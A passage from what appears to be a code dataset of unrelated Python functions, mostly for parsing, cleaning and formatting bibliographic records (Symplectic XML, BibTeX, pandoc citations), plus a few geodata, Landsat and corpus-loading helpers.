native_element.find(SYMPLECTIC_NAMESPACE + 'isbn-13') )\r\n biblio_object.issn = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'issn') )\r\n biblio_object.issue = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'issue') )\r\n biblio_object.journal = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'journal') )\r\n biblio_object.journal_article_type = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'journal_article_type') )\r\n biblio_object.language = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'language') )\r\n biblio_object.location = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'location') )\r\n biblio_object.medium = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'medium') )\r\n biblio_object.name_of_conference = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'name-of-conference') )\r\n biblio_object.notes = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'notes') )\r\n biblio_object.number = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'number') )\r\n biblio_object.number_of_pages = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'number-of-pages') )\r\n biblio_object.number_of_pieces = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'number-of-pieces') )\r\n biblio_object.parent_title = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'parent-title') )\r\n biblio_object.patent_number = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'patent-number') )\r\n biblio_object.patent_status = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'patent-status') )\r\n biblio_object.pii = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'pii') )\r\n biblio_object.place_of_publication = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'place_of_publication') )\r\n biblio_object.publication_date = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'publication-date') )\r\n biblio_object.publication_status = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'publication-status') )\r\n biblio_object.publisher = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'publisher') )\r\n biblio_object.series = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'series') )\r\n biblio_object.start_date = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'start-date') )\r\n biblio_object.title = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'title') )\r\n biblio_object.version = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'version') )\r\n biblio_object.volume = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'volume') )\r\n #authors\r\n if authors_subtree is not None:\r\n biblio_object.authors = ''\r\n author_list = []\r\n for author_element in authors_subtree.getchildren():\r\n name = SymplecticXMLPubs.__getElementText(author_element.find(SYMPLECTIC_NAMESPACE + 'name'))\r\n initials = SymplecticXMLPubs.__getElementText(author_element.find(SYMPLECTIC_NAMESPACE + 'initials'))\r\n author_list.append( unicode(name) + ' ' + unicode(initials) )\r\n for author in author_list:\r\n biblio_object.authors = biblio_object.authors + author + ', '\r\n #derived authors\r\n biblio_object.number_of_authors = len(author_list)\r\n if len(author_list) > 0:\r\n biblio_object.first_author = author_list[0]\r\n if len(author_list) > 1:\r\n biblio_object.last_author = author_list[-1] \r\n #keywords\r\n if keywords_subtree is not None:\r\n biblio_object.keywords = ''\r\n for keyword_element in keywords_subtree.getchildren():\r\n biblio_object.keywords = biblio_object.keywords + '|' + unicode(keyword_element.text)\r\n #link bibliographic-record object and passed-in publication object\r\n biblio_object.publication = publication_object\r\n #save\r\n biblio_object.save()\r\n #++++++URLS++++++\r\n #delete all existing URLs for this biblio-record\r\n biblio_object.urls.all().delete()\r\n #URL elements are held in a subtree\r\n url_subtree = biblio_element.find(SYMPLECTIC_NAMESPACE + 'urls')\r\n #check if any url elements in subtree\r\n if url_subtree is None or len(url_subtree) < 1:\r\n return\r\n #for each url element in subtree\r\n for url_element in url_subtree.getchildren():\r\n SymplecticXMLPubs.__createURLObjFromURLElement(url_element, biblio_object)", "def add_library(self):\n library = self.new_section('The Library')\n books = self.wiki('the-library')._soup(class_='boxbook')\n template = (\n '<div class=\"book-title\">{}</div>'\n '<div class=\"book-description\">{}</div>')\n for b in books:\n title = b.find(class_='booktitle').string\n description = b.find(class_='boxleft')('div')[0].text.strip()\n excerpts = [self.wiki.site + a['href']\n for a in b.find(class_='boxright')('a')]\n if title == 'The Journal of Aframos Longjourney':\n links = self.wiki(excerpts[1])._soup.select('#page-content a')\n links = [\n 'http://wanderers-library.wikidot.com/' +\n l['href'].split('/')[-1] for l in links]\n excerpts = [excerpts[0]] + links\n book = self.add_page(\n title, template.format(title, description), library)\n for url in excerpts:\n self.add_url(url, book)", "def get_bibtex(self):\n url=\"http://www.biomedcentral.com/download/citation\"\n parameters={'citation':'on', \n 'result-selection':'THIS_PAGE',\n 'suplements': 'false',\n 'citationType':'BIBTEX_WITH_ABSTRACT',\n 'articleIdThisPage':self.article_ids\n }\n data=urllib.urlencode(parameters)\n self.bibtex=urllib2.urlopen(url,data)", "def add_ref(doc_name, bib_name, keep_label=False, slides=False):\n bib_path = bib_name # os.path.join(static_path, \"tex\", bib_name)\n if not slides:\n keep_label = True\n with open(doc_name, \"r\") as f:\n _file = f.read()\n # find citations\n match = re.findall(r\"\\[@.*?\\]\", _file)\n references = []\n # print(match)\n for cit in match:\n tmp_cite_html = tempfile.NamedTemporaryFile(suffix=\".html\", delete=True)\n tmp = tempfile.NamedTemporaryFile(suffix=\".md\", delete=True)\n with open(tmp.name, \"w\") as md_file:\n # Open the file for writing.\n md_file.write(cit)\n\n pandoc_command = [\n \"pandoc\",\n \"-C\",\n tmp.name,\n \"--bibliography\",\n bib_path,\n \"--csl\",\n \"./templates/my-csl.csl\",\n \"-o\",\n tmp_cite_html.name,\n ]\n if not slides:\n for tag in [\"--metadata\", \"link-citations=true\"]:\n pandoc_command.append(tag)\n output = subprocess.check_output(\n pandoc_command, stderr=subprocess.STDOUT\n ).decode(\"utf-8\")\n print(output.rstrip())\n tmp.close()\n with open(tmp_cite_html.name, \"r\") as cite_html:\n # Open the file for writing.\n cit_new = cite_html.read()\n # print(cit_new)\n if not keep_label:\n # remove first line\n cit_new = \"\\n\".join(cit_new.splitlines()[1:])\n else:\n lines = cit_new.splitlines()\n # remove the <p> tags\n lines[0] = lines[0][3:-4]\n cit_new = \"\\n\".join(lines)\n if slides:\n _file = _file.replace(cit, cit_new)\n else:\n _file = _file.replace(cit, lines[0])\n # collect the references\n references.append(\"<p>\")\n references.append(\"\\n\".join(lines))\n references.append(\"</p>\")\n # paste_refs_end()\n tmp_cite_html.close()\n if slides:\n with open(doc_name, \"w\") as f:\n f.write(_file)\n if not slides:\n if references == []:\n _file=clean_html_refs(_file)\n else:\n _file = _file.replace(\"<bibliography-placeholder>\", \"\\n\".join(references))\n with open(doc_name, \"w\") as f:\n f.write(_file)\n return", "def mr2bib(id_list):\n d = mr2bib_dict(id_list)\n l = []\n for id in id_list:\n try:\n l.append(d[id])\n except:\n l.append(ReferenceErrorInfo(\"Not found\", id))\n\n return l", "def _FindBibEntries(self):\n bibs = \" \".join(glob.glob(\"*.bib\"))\n cat_process = subprocess.Popen(shlex.split(\"cat %s\" % bibs),\n stdout=subprocess.PIPE)\n grep_process = subprocess.Popen(shlex.split(\"grep ^@\"),\n stdin=cat_process.stdout,\n stdout=subprocess.PIPE)\n cat_process.stdout.close()\n grep2_process = subprocess.Popen(shlex.split(\"grep -vi @string\"),\n stdin=grep_process.stdout,\n stdout=subprocess.PIPE)\n grep_process.stdout.close()\n\n lines = grep2_process.communicate()[0]\n\n ret = []\n for l in lines.split(\"\\n\"):\n ret.append(responses.BuildCompletionData(\n re.sub(r\"@([A-Za-z]*)\\s*{\\s*([^,]*),.*\", r\"\\2\", l)\n )\n )\n return ret", "def load_geodata_containers(subsectie=None):\n if os.path.isfile(\"data/shp/Inzameling_huisvuil_080520.shp\"):\n source = gpd.read_file('data/shp/Inzameling_huisvuil_080520.shp')\n elif os.path.isfile(\"../data/shp/Inzameling_huisvuil_080520.shp\"):\n source = gpd.read_file('../data/shp/Inzameling_huisvuil_080520.shp')\n source = source[source['aanbiedwij'] ==\n 'Breng uw restafval naar een container voor restafval.']\n if subsectie:\n source = source[source['sdcode'].isin(list(subsectie))]\n return list(source.geometry)", "def parse_bib_from_list(filename):\n\tentry_regex = r\"TITEL: .*\\s*AUTOR: .*\"\n\tparse_func = make_parse_func(r\"AUTOR: (.*)\", r\"TITEL: (.*)\", None)\n\treturn parse_bib(filename, entry_regex, parse_func)", "def getAuthors(self): #$NON-NLS-1$\r", "def from_bibkey(glottocode, bibkey):\n\tGLOTTOLOG_PATH = path.expanduser('~/Documents/glottolog-4.0')\n\n\tfrom pyglottolog import Glottolog\n\tg = Glottolog(GLOTTOLOG_PATH)\n\n\tlanguoid = g.languoid(glottocode)\t\n\tref = [x for x in languoid.sources if x.key == bibkey]\n\tif not ref:\n\t\traise Exception('Reference not found')\n\n\tsource = ref[0].get_source(g)\n\treturn source.fields", "def get_kritis(self, kriti_list):\n self.kritis = [[k.name, k.composer, k.link] for k in kriti_list if \n k.raga == self.name]", "def list_genomes():\n genome_list = yaml.load(open(script_dir + \"/utils/genomes.yaml\",\"r\"))\n print(\"\")\n print(\"\\033[1m%-30s\\t%-30s\\033[0m\" % (\"Reference Name\", \"Location\"))\n for k,v in genome_list.items():\n print(\"%-30s\\t%-30s\" % (k, v))\n print(\"\")", "def format_bib_entry(e: BibDocument):\n if e.bibtex is not None:\n b = e.bibtex\n s = fix_string(b.get('title', b.get('ID', '?'))) + '\\n'\n s += format_author(b.get('author', b.get('editor', '?'))) + ' ' + b.get('year', '')\n if len(e.filepaths) > 0:\n s += ' [PDF]'\n return s\n else:\n return e.relpath()", "def main(bib_fpath=None):\n\n if bib_fpath is None:\n bib_fpath = 'My Library.bib'\n\n # DEBUG = ub.argflag('--debug')\n # Read in text and ensure ascii format\n dirty_text = ut.readfrom(bib_fpath)\n\n from fixtex.fix_tex import find_used_citations, testdata_fpaths\n\n if exists('custom_extra.bib'):\n extra_parser = bparser.BibTexParser(ignore_nonstandard_types=False)\n parser = bparser.BibTexParser()\n ut.delete_keys(parser.alt_dict, ['url', 'urls'])\n print('Parsing extra bibtex file')\n extra_text = ut.readfrom('custom_extra.bib')\n extra_database = extra_parser.parse(extra_text, partial=False)\n print('Finished parsing extra')\n extra_dict = extra_database.get_entry_dict()\n else:\n extra_dict = None\n\n #udata = dirty_text.decode(\"utf-8\")\n #dirty_text = udata.encode(\"ascii\", \"ignore\")\n #dirty_text = udata\n\n # parser = bparser.BibTexParser()\n # bib_database = parser.parse(dirty_text)\n # d = bib_database.get_entry_dict()\n\n print('BIBTEXPARSER LOAD')\n parser = bparser.BibTexParser(ignore_nonstandard_types=False,\n common_strings=True)\n ut.delete_keys(parser.alt_dict, ['url', 'urls'])\n print('Parsing bibtex file')\n bib_database = parser.parse(dirty_text, partial=False)\n print('Finished parsing')\n\n bibtex_dict = bib_database.get_entry_dict()\n old_keys = list(bibtex_dict.keys())\n new_keys = []\n for key in ub.ProgIter(old_keys, label='fixing keys'):\n new_key = key\n new_key = new_key.replace(':', '')\n new_key = new_key.replace('-', '_')\n new_key = re.sub('__*', '_', new_key)\n new_keys.append(new_key)\n\n # assert len(ut.find_duplicate_items(new_keys)) == 0, 'new keys created conflict'\n assert len(ub.find_duplicates(new_keys)) == 0, 'new keys created conflict'\n\n for key, new_key in zip(old_keys, new_keys):\n if key != new_key:\n entry = bibtex_dict[key]\n entry['ID'] = new_key\n bibtex_dict[new_key] = entry\n del bibtex_dict[key]\n\n # The bibtext is now clean. Print it to stdout\n #print(clean_text)\n verbose = None\n if verbose is None:\n verbose = 1\n\n # Find citations from the tex documents\n key_list = None\n if key_list is None:\n cacher = ub.Cacher('texcite1', enabled=0)\n data = cacher.tryload()\n if data is None:\n fpaths = testdata_fpaths()\n key_list, inverse = find_used_citations(fpaths, return_inverse=True)\n # ignore = ['JP', '?', 'hendrick']\n # for item in ignore:\n # try:\n # key_list.remove(item)\n # except ValueError:\n # pass\n if verbose:\n print('Found %d citations used in the document' % (len(key_list),))\n data = key_list, inverse\n cacher.save(data)\n key_list, inverse = data\n\n # else:\n # key_list = None\n\n unknown_pubkeys = []\n debug_author = ub.argval('--debug-author', default=None)\n # ./fix_bib.py --debug_author=Kappes\n\n if verbose:\n print('Fixing %d/%d bibtex entries' % (len(key_list), len(bibtex_dict)))\n\n # debug = True\n debug = False\n if debug_author is not None:\n debug = False\n\n known_keys = list(bibtex_dict.keys())\n missing_keys = set(key_list) - set(known_keys)\n if extra_dict is not None:\n missing_keys.difference_update(set(extra_dict.keys()))\n\n if missing_keys:\n print('The library is missing keys found in tex files %s' % (\n ub.repr2(missing_keys),))\n\n # Search for possible typos:\n candidate_typos = {}\n sedlines = []\n for key in missing_keys:\n candidates = ut.closet_words(key, known_keys, num=3, subset=True)\n if len(candidates) > 1:\n top = candidates[0]\n if ut.edit_distance(key, top) == 1:\n # \"sed -i -e 's/{}/{}/g' *.tex\".format(key, top)\n import os\n replpaths = ' '.join([relpath(p, os.getcwd()) for p in inverse[key]])\n sedlines.append(\"sed -i -e 's/{}/{}/g' {}\".format(key, top, replpaths))\n candidate_typos[key] = candidates\n print('Cannot find key = %r' % (key,))\n print('Did you mean? %r' % (candidates,))\n\n print('Quick fixes')\n print('\\n'.join(sedlines))\n\n # group by file\n just = max([0] + list(map(len, missing_keys)))\n missing_fpaths = [inverse[key] for key in missing_keys]\n for fpath in sorted(set(ub.flatten(missing_fpaths))):\n # ut.fix_embed_globals()\n subkeys = [k for k in missing_keys if fpath in inverse[k]]\n print('')\n ut.cprint('--- Missing Keys ---', 'blue')\n ut.cprint('fpath = %r' % (fpath,), 'blue')\n ut.cprint('{} | {}'.format('Missing'.ljust(just), 'Did you mean?'), 'blue')\n for key in subkeys:\n print('{} | {}'.format(\n ut.highlight_text(key.ljust(just), 'red'),\n ' '.join(candidate_typos[key]))\n )\n\n # for key in list(bibtex_dict.keys()):\n\n if extra_dict is not None:\n # Extra database takes precidence over regular\n key_list = list(ut.unique(key_list + list(extra_dict.keys())))\n for k, v in extra_dict.items():\n bibtex_dict[k] = v\n\n full = ub.argflag('--full')\n\n for key in key_list:\n try:\n entry = bibtex_dict[key]\n except KeyError:\n continue\n self = BibTexCleaner(key, entry, full=full)\n\n if debug_author is not None:\n debug = debug_author in entry.get('author', '')\n\n if debug:\n ut.cprint(' --- ENTRY ---', 'yellow')\n print(ub.repr2(entry, nl=1))\n\n entry = self.fix()\n # self.clip_abstract()\n # self.shorten_keys()\n # self.fix_authors()\n # self.fix_year()\n # old_pubval = self.fix_pubkey()\n # if old_pubval:\n # unknown_pubkeys.append(old_pubval)\n # self.fix_arxiv()\n # self.fix_general()\n # self.fix_paper_types()\n\n if debug:\n print(ub.repr2(entry, nl=1))\n ut.cprint(' --- END ENTRY ---', 'yellow')\n bibtex_dict[key] = entry\n\n unwanted_keys = set(bibtex_dict.keys()) - set(key_list)\n if verbose:\n print('Removing unwanted %d entries' % (len(unwanted_keys)))\n ut.delete_dict_keys(bibtex_dict, unwanted_keys)\n\n if 0:\n d1 = bibtex_dict.copy()\n full = True\n for key, entry in d1.items():\n self = BibTexCleaner(key, entry, full=full)\n pub = self.publication()\n if pub is None:\n print(self.entry['ENTRYTYPE'])\n\n old = self.fix_pubkey()\n x1 = self._pubval()\n x2 = self.standard_pubval(full=full)\n # if x2 is not None and len(x2) > 5:\n # print(ub.repr2(self.entry))\n\n if x1 != x2:\n print('x2 = %r' % (x2,))\n print('x1 = %r' % (x1,))\n print(ub.repr2(self.entry))\n\n # if 'CVPR' in self.entry.get('booktitle', ''):\n # if 'CVPR' != self.entry.get('booktitle', ''):\n # break\n if old:\n print('old = %r' % (old,))\n d1[key] = self.entry\n\n if full:\n d1 = bibtex_dict.copy()\n\n import numpy as np\n import pandas as pd\n df = pd.DataFrame.from_dict(d1, orient='index')\n\n paged_items = df[~pd.isnull(df['pub_accro'])]\n has_pages = ~pd.isnull(paged_items['pages'])\n print('have pages {} / {}'.format(has_pages.sum(), len(has_pages)))\n print(ub.repr2(paged_items[~has_pages]['title'].values.tolist()))\n\n entrytypes = dict(list(df.groupby('pub_type')))\n if False:\n # entrytypes['misc']\n g = entrytypes['online']\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n\n entrytypes['book']\n entrytypes['thesis']\n g = entrytypes['article']\n g = entrytypes['incollection']\n g = entrytypes['conference']\n\n def lookup_pub(e):\n if e == 'article':\n return 'journal', 'journal'\n elif e == 'incollection':\n return 'booksection', 'booktitle'\n elif e == 'conference':\n return 'conference', 'booktitle'\n return None, None\n\n for e, g in entrytypes.items():\n print('e = %r' % (e,))\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n if 'pub_full' in g.columns:\n place_title = g['pub_full'].tolist()\n print(ub.repr2(ub.dict_hist(place_title)))\n else:\n print('Unknown publications')\n\n if 'report' in entrytypes:\n g = entrytypes['report']\n missing = g[pd.isnull(g['title'])]\n if len(missing):\n print('Missing Title')\n print(ub.repr2(missing[['title', 'author']].values.tolist()))\n\n if 'journal' in entrytypes:\n g = entrytypes['journal']\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n\n missing = g[pd.isnull(g['journal'])]\n if len(missing):\n print('Missing Journal')\n print(ub.repr2(missing[['title', 'author']].values.tolist()))\n\n if 'conference' in entrytypes:\n g = entrytypes['conference']\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n\n missing = g[pd.isnull(g['booktitle'])]\n if len(missing):\n print('Missing Booktitle')\n print(ub.repr2(missing[['title', 'author']].values.tolist()))\n\n if 'incollection' in entrytypes:\n g = entrytypes['incollection']\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n\n missing = g[pd.isnull(g['booktitle'])]\n if len(missing):\n print('Missing Booktitle')\n print(ub.repr2(missing[['title', 'author']].values.tolist()))\n\n if 'thesis' in entrytypes:\n g = entrytypes['thesis']\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n missing = g[pd.isnull(g['institution'])]\n if len(missing):\n print('Missing Institution')\n print(ub.repr2(missing[['title', 'author']].values.tolist()))\n\n # import utool\n # utool.embed()\n\n # Overwrite BibDatabase structure\n bib_database._entries_dict = bibtex_dict\n bib_database.entries = list(bibtex_dict.values())\n\n #conftitle_to_types_set_hist = {key: set(val) for key, val in conftitle_to_types_hist.items()}\n #print(ub.repr2(conftitle_to_types_set_hist))\n\n print('Unknown conference keys:')\n print(ub.repr2(sorted(unknown_pubkeys)))\n print('len(unknown_pubkeys) = %r' % (len(unknown_pubkeys),))\n\n writer = BibTexWriter()\n writer.contents = ['comments', 'entries']\n writer.indent = ' '\n writer.order_entries_by = ('type', 'author', 'year')\n\n new_bibtex_str = bibtexparser.dumps(bib_database, writer)\n\n # Need to check\n #jegou_aggregating_2012\n\n # Fix the Journal Abreviations\n # References:\n # https://www.ieee.org/documents/trans_journal_names.pdf\n\n # Write out clean bibfile in ascii format\n clean_bib_fpath = ub.augpath(bib_fpath.replace(' ', '_'), suffix='_clean')\n\n if not ub.argflag('--dryrun'):\n ut.writeto(clean_bib_fpath, new_bibtex_str)", "def main():\n import shutil\n import json\n\n if not os.path.isdir(args.cache):\n # creation dossier cache\n os.mkdir(args.cache)\n\n if not os.path.exists(args.cache+'/overviews.json'):\n # creation fichier overviews.json a partir d'un fichier ressource\n shutil.copy2(args.overviews, args.cache+'/overviews.json')\n\n with open(args.cache+'/overviews.json') as json_overviews:\n overviews_dict = json.load(json_overviews)\n if not (\"list_OPI\" in overviews_dict):\n overviews_dict[\"list_OPI\"] = []\n\n out_raster_srs = gdal.osr.SpatialReference()\n out_raster_srs.ImportFromEPSG(overviews_dict['crs']['code'])\n conn_string = \"PG:host=\"+host+\" dbname=\"+database+\" user=\"+user+\" password=\"+password\n db_graph = gdal.OpenEx(conn_string, gdal.OF_VECTOR)\n if db_graph is None:\n raise ValueError(\"Connection to database failed\")\n list_filename = glob.glob(args.input)\n if verbose > 0:\n print(len(list_filename), \"fichier(s) a traiter\")\n\n try:\n with open(args.cache+'/cache_mtd.json', 'r') as inputfile:\n mtd = json.load(inputfile)\n except:\n mtd = {}\n\n cliche_dejaTraites = []\n for filename in list_filename:\n cliche = Path(filename).stem\n \n if (cliche in overviews_dict['list_OPI']):\n # OPI déja traitée\n cliche_dejaTraites.append(cliche)\n else:\n print('nouvelle image: ', filename)\n color = [randrange(255), randrange(255), randrange(255)]\n while (color[0] in mtd) and (color[1] in mtd[color[0]]) and (color[2] in mtd[color[0]][color[1]]):\n color = [randrange(255), randrange(255), randrange(255)]\n if color[0] not in mtd:\n mtd[color[0]] = {}\n if color[1] not in mtd[color[0]]:\n mtd[color[0]][color[1]] = {}\n mtd[color[0]][color[1]][color[2]] = cliche\n process_image(overviews_dict, db_graph, filename, color, out_raster_srs)\n # on ajout l'OPI traitée a la liste\n overviews_dict[\"list_OPI\"].append(cliche)\n\n with open(args.cache+'/cache_mtd.json', 'w') as outfile:\n json.dump(mtd, outfile)\n\n with open(args.cache+'/overviews.json', 'w') as outfile:\n json.dump(overviews_dict, outfile)\n\n print(\"\\n\", len(list_filename) - len(cliche_dejaTraites),\"/\",len(list_filename),\"OPI(s) ajoutée(s)\")\n if len(cliche_dejaTraites) > 0:\n print(cliche_dejaTraites, \"déjà traitées : OPI non recalculée(s)\")", "def getLandsatCollection():\n ## standardize band names\n bn8 = ['B1', 'B2', 'B3', 'B4', 'B6', 'pixel_qa', 'B5', 'B7']\n bn7 = ['B1', 'B1', 'B2', 'B3', 'B5', 'pixel_qa', 'B4', 'B7']\n bn5 = ['B1', 'B1', 'B2', 'B3', 'B5', 'pixel_qa', 'B4', 'B7']\n bns = ['uBlue', 'Blue', 'Green', 'Red', 'Swir1', 'BQA', 'Nir', 'Swir2']\n\n # create a merged collection from landsat 5, 7, and 8\n ls5 = ee.ImageCollection(\"LANDSAT/LT05/C01/T1_SR\").select(bn5, bns)\n\n ls7 = (ee.ImageCollection(\"LANDSAT/LE07/C01/T1_SR\")\n .filterDate('1999-04-15', '2003-05-30')\n .select(bn7, bns))\n\n ls8 = ee.ImageCollection(\"LANDSAT/LC08/C01/T1_SR\").select(bn8, bns)\n\n merged = ls5.merge(ls7).merge(ls8)\n\n return(merged)", "def add_references_to_papers(infile, dir):\n papers = json.load(open(infile))\n for paper in papers:\n for file in os.listdir(dir):\n if file.split(\".txt\")[0] == paper['doi']: # Must find the correct file to parse\n filename = TEXT_DIR+file\n refs =extract_references_from_txt(filename) #Uses the text files to find references\n paper['references']=refs\n return papers", "def getCubes():", "def pdflookup(pdf, allresults, outformat):\n txt = convert_pdf_to_txt(pdf)\n # remove all non alphanumeric characters\n txt = re.sub(\"\\W\", \" \", txt)\n words = txt.strip().split()[:20]\n gsquery = \" \".join(words)\n bibtexlist = query(gsquery, outformat, allresults)\n return bibtexlist", "def load() -> list:\n peliculas: list = []\n\n with open('./db.json', 'r') as in_file:\n for film in json.load(in_file):\n peliculas.append(film)\n\n # Sort films by ID\n # Useful when asking the user to select a movie\n peliculas = sorted(peliculas, key=lambda x: x['title'])\n return peliculas", "def load_federalist_corpus(filename):\n with open(filename, \"rt\") as f:\n data = f.read()\n papers = data.split(\"FEDERALIST\")\n\n # all start with \"To the people of the State of New York:\" (sometimes . instead of :)\n # all end with PUBLIUS (or no end at all)\n locations = [(i, [-1] + [m.end() + 1 for m in re.finditer(r\"of the State of New York\", p)],\n [-1] + [m.start() for m in re.finditer(r\"PUBLIUS\", p)]) for i, p in enumerate(papers)]\n papers_content = [papers[i][max(loc[1]):max(loc[2])] for i, loc in enumerate(locations)]\n\n # discard entries that are not actually a paper\n papers_content = [p for p in papers_content if len(p) > 0]\n\n # replace all whitespace with a single space\n papers_content = [re.sub(r\"\\s+\", \" \", p).lower() for p in papers_content]\n\n # add spaces before all punctuation, so they are separate tokens\n punctuation = set(re.findall(r\"[^\\w\\s]+\", \" \".join(papers_content))) - {\"-\", \"'\"}\n for c in punctuation:\n papers_content = [p.replace(c, \" \" + c + \" \") for p in papers_content]\n papers_content = [re.sub(r\"\\s+\", \" \", p).lower().strip() for p in papers_content]\n\n authors = [tuple(re.findall(\"MADISON|JAY|HAMILTON\", a)) for a in papers]\n authors = [a for a in authors if len(a) > 0]\n\n numbers = [re.search(r\"No\\. \\d+\", p).group(0) for p in papers if re.search(r\"No\\. \\d+\", p)]\n\n return papers_content, authors, numbers", "def _extract_core_biblio(self, bib):\n try:\n pubnumber = bib_scalar(bib, 'pubnumber')\n pubdate = datetime.strptime(bib_scalar(bib, 'pubdate'), '%Y%m%d')\n fam_raw = bib_scalar(bib, 'family_id')\n family_id = int(fam_raw) if fam_raw != None else fam_raw\n assign_applic_raw = bib.get('assign_applic')\n assign_applic = '|'.join(assign_applic_raw) if len(assign_applic_raw) > 0 else \"\"\n except KeyError, exc:\n raise RuntimeError(\"Document is missing mandatory biblio field (KeyError: {})\".format(exc))\n if len(pubnumber) == 0:\n raise RuntimeError(\"Document publication number field is empty\")\n\n return family_id, pubdate, pubnumber, assign_applic", "def replace_bibliography(self, text):\n\n indexBegin = 0\n indexEnd = 0\n indexBegin = text.find('\\\\bibliography{', indexBegin+1)\n indexEnd = text.find('}', indexBegin+1)\n text_to_replace = text[indexBegin:indexEnd+1]\n new_text = self.dir_helper.read_file(file_name = self.temp_dir + self.config.BBL_FILE)\n bbl_text = \"\"\n for line in new_text.split('\\n'):\n bbl_text = bbl_text + '\\t' + line + '\\n'\n text = text.replace(text_to_replace, bbl_text)\n\n return text", "def get_book_titles(self, lib_db):\n titles = []\n conn = sqlite3.connect(lib_db)\n c = conn.cursor()\n for row in c.execute(\"SELECT ZTITLE FROM ZBKLIBRARYASSET WHERE ZTITLE <> '' AND ZTITLE <> 'none'\"):\n titles.append(row[0])\n conn.close()\n return titles", "def parse_bibtex(self, data: str) -> Dict:\n\n new_bib = [line for line in data.splitlines() if \"= ,\" not in line]\n new_bib = \"\\n\".join(new_bib)\n bib_db: bibtexparser.bibdatabase.BibDatabase = bibtexparser.loads(new_bib)\n result = dict()\n for entry in bib_db.entries:\n osti_id = entry[\"ID\"].split(\"_\")[1]\n result[osti_id] = entry\n return result", "def __init__(self):\n self.bib_database = BibDatabase()\n #: Callback function to process BibTeX entries after parsing, for example to create a list from a string with\n #: multiple values. By default all BibTeX values are treated as simple strings. Default: `None`.\n self.customization = None\n\n #: Ignore non-standard BibTeX types (`book`, `article`, etc). Default: `True`.\n self.ignore_nonstandard_types = True\n\n #: Sanitise BibTeX field names, for example change `url` to `link` etc. Field names are always converted to\n #: lowercase names. Default: `True`.\n self.homogenise_fields = True\n\n # On some sample data files, the character encoding detection simply\n # hangs We are going to default to utf8, and mandate it.\n self.encoding = 'utf8'\n\n # pre-defined set of key changes\n self.alt_dict = {\n 'keyw': 'keyword',\n 'keywords': 'keyword',\n 'authors': 'author',\n 'editors': 'editor',\n 'url': 'link',\n 'urls': 'link',\n 'links': 'link',\n 'subjects': 'subject'\n }\n\n self.replace_all_re = re.compile(r'((?P<pre>\"?)\\s*(#|^)\\s*(?P<id>[^\\d\\W]\\w*)\\s*(#|$)\\s*(?P<post>\"?))', re.UNICODE)", "def __bol(soup):\n news = []\n anchors = soup.find(\n 'div', class_='mais-clicadas-lista link-primary').find_all('a')\n\n for a in anchors:\n title = a.find('span', class_='mais-clicadas-item-content').text\n link = a['href']\n news.append(dict(title=title, link=link))\n return news", "def get_all_books() -> List[Dict]:\n pass", "def collecte_docs(self, chercheur, overwrite=False): # self,\n init = overwrite # If True, data persistence is lost when references are updated\n docs = hal.find_publications(chercheur[\"halId_s\"], \"authIdHal_s\")\n\n progress_recorder = ProgressRecorder(self)\n progress_recorder.set_progress(0, len(docs), description=\"récupération des données HAL\")\n # Insert documents collection\n for num, doc in enumerate(docs):\n doc[\"country_colaboration\"] = location_docs.generate_countrys_fields(doc)\n doc = doi_enrichissement.docs_enrichissement_doi(doc)\n if \"fr_abstract_s\" in doc.keys():\n if isinstance(doc[\"fr_abstract_s\"], list):\n doc[\"fr_abstract_s\"] = \"/n\".join(doc[\"fr_abstract_s\"])\n if len(doc[\"fr_abstract_s\"]) > 100:\n doc[\"fr_entites\"] = keyword_enrichissement.return_entities(\n doc[\"fr_abstract_s\"], \"fr\"\n )\n doc[\"fr_teeft_keywords\"] = keyword_enrichissement.keyword_from_teeft(\n doc[\"fr_abstract_s\"], \"fr\"\n )\n if \"en_abstract_s\" in doc.keys():\n if isinstance(doc[\"en_abstract_s\"], list):\n doc[\"en_abstract_s\"] = \"/n\".join(doc[\"en_abstract_s\"])\n if len(doc[\"en_abstract_s\"]) > 100:\n doc[\"en_entites\"] = keyword_enrichissement.return_entities(\n doc[\"en_abstract_s\"], \"en\"\n )\n doc[\"en_teeft_keywords\"] = keyword_enrichissement.keyword_from_teeft(\n doc[\"en_abstract_s\"], \"en\"\n )\n\n doc[\"_id\"] = doc[\"docid\"]\n doc[\"validated\"] = True\n\n 